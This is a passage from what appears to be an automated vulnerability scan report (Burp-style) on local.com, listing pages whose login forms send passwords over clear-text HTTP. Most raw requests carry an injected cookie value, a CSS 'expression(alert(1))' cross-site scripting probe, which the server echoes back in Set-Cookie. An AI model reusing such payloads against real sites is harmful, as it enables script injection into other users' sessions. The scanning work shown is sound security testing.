User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.15. http://www.local.com/coupons/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/coupons/

The form contains the following password field:

password

Request

GET /coupons/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.16. http://www.local.com/coupons/printable/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/printable/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/coupons/printable/

The form contains the following password field:

password

Request

GET /coupons/printable/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 25463
Date: Thu, 03 Feb 2011 16:45:55 GMT
Content-Length: 25463
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:45:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Not Found - Local.com</title>
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.17. http://www.local.com/dialogs/register.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/register.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/dialogs/register.aspx

The form contains the following password fields:

defaultPageTemplate$password
defaultPageTemplate$password2
defaultPageTemplate$haveActPassword

Request

GET /dialogs/register.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.18. http://www.local.com/events/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/events/

The form contains the following password field:

password

Request

GET /events/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.19. http://www.local.com/events/category/music/dallas-tx.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/music/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/events/category/music/dallas-tx.aspx

The form contains the following password field:

password

Request

GET /events/category/music/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.20. http://www.local.com/events/category/performing-arts/dallas-tx.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/performing-arts/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/events/category/performing-arts/dallas-tx.aspx

The form contains the following password field:

password

Request

GET /events/category/performing-arts/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.21. http://www.local.com/events/category/sports/dallas-tx.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/sports/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/events/category/sports/dallas-tx.aspx

The form contains the following password field:

password

Request

GET /events/category/sports/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.22. http://www.local.com/faq.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/faq.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/faq.aspx

The form contains the following password field:

password

Request

GET /faq.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.23. http://www.local.com/privacy/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/privacy/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/privacy/

The form contains the following password field:

password

Request

GET /privacy/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.24. http://www.local.com/results.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/results.aspx

The form contains the following password field:

password

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.25. http://www.local.com/results/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/results/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/results/

The form contains the following password field:

password

Request

GET /results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.26. http://www.local.com/sitemap.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/sitemap.aspx

The form contains the following password field:

password

Request

GET /sitemap.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.27. http://www.local.com/sitemap/chicago-il.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/chicago-il.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/sitemap/chicago-il.aspx

The form contains the following password field:

password

Request

GET /sitemap/chicago-il.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

3.28. http://www.local.com/sitemap/los-angeles-ca.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/los-angeles-ca.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.local.com/sitemap/los-angeles-ca.aspx

The form contains the following password field:

password

Request

GET /sitemap/los-angeles-ca.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
